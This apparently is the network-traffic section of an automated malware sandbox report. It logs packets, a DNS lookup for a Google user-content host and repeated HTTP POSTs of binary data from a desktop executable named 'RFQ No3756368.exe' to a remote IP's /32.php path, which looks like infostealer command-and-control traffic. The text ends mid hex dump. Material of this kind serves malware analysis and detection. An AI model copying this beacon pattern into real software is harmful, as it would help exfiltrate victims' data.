Jun 15, 2021 13:03:15.915034056 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.915142059 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.917350054 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.917376041 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.917562008 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.919647932 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.919676065 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.919770002 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.919784069 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.921932936 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.921957016 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.922036886 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.922171116 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.924305916 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.924333096 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.926023960 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.926630974 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.926651955 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.926722050 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.929029942 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.929054022 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.929275990 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.931356907 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.931421041 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.931611061 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.933303118 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.933330059 CEST	443	49755	142.250.201.193	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2021 13:01:58.743587017 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:01:58.777651072 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 15, 2021 13:01:59.423510075 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:01:59.466650009 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:00.372550011 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:00.405438900 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:01.090545893 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:01.115017891 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:02.994705915 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:03.019193888 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:03.862865925 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:03.892893076 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:04.845959902 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:04.875889063 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:05.815865993 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:05.841167927 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:10.674103975 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:10.701765060 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:11.606772900 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:11.632286072 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:12.276796103 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:12.303281069 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:14.401082039 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:14.425868988 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:15.329454899 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:15.353465080 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:16.490122080 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:16.514209032 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:19.404851913 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:19.434649944 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:21.054783106 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:21.087591887 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:22.157437086 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:22.181431055 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:22.933741093 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:22.960975885 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:28.169780016 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:28.207357883 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 15, 2021 13:02:54.254050970 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:02:54.281557083 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 15, 2021 13:03:03.534667969 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:03:03.572457075 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 15, 2021 13:03:06.956644058 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:03:06.996572018 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 15, 2021 13:03:13.662663937 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:03:13.711720943 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 15, 2021 13:03:14.373939991 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 15, 2021 13:03:14.418020964 CEST	53	60875	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 15, 2021 13:03:14.373939991 CEST	192.168.2.4	8.8.8.8	0xf8a2	Standard query (0)	doc-14-7g-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 15, 2021 13:03:14.418020964 CEST	8.8.8.8	192.168.2.4	0xf8a2	No error (0)	doc-14-7g-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Jun 15, 2021 13:03:14.418020964 CEST	8.8.8.8	192.168.2.4	0xf8a2	No error (0)	googlehosted.l.googleusercontent.com		142.250.201.193	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

63.141.228.141

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49756	63.141.228.141	80	C:\Users\user\Desktop\RFQ No3756368.exe

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2021 13:03:17.644850016 CEST	4200	OUT	POST /32.php/nuldTOn9SBn3G HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 8C21EEAE Content-Length: 190 Connection: close
Jun 15, 2021 13:03:18.384444952 CEST	4201	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Jun 2021 11:03:17 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49757	63.141.228.141	80	C:\Users\user\Desktop\RFQ No3756368.exe

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2021 13:03:18.762553930 CEST	4211	OUT	POST /32.php/nuldTOn9SBn3G HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 8C21EEAE Content-Length: 190 Connection: close
Jun 15, 2021 13:03:19.514477015 CEST	4213	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Jun 2021 11:03:18 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49758	63.141.228.141	80	C:\Users\user\Desktop\RFQ No3756368.exe

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2021 13:03:19.780967951 CEST	4223	OUT	POST /32.php/nuldTOn9SBn3G HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 8C21EEAE Content-Length: 163 Connection: close
Jun 15, 2021 13:03:20.522725105 CEST	4225	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Jun 2021 11:03:19 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49759	63.141.228.141	80	C:\Users\user\Desktop\RFQ No3756368.exe

Timestamp	kBytes transferred	Direction	Data
Jun 15, 2021 13:03:20.825253010 CEST	4235	OUT	POST /32.php/nuldTOn9SBn3G HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 8C21EEAE Content-Length: 163 Connection: close
Jun 15, 2021 13:03:21.576517105 CEST	4236	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Jun 2021 11:03:20 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 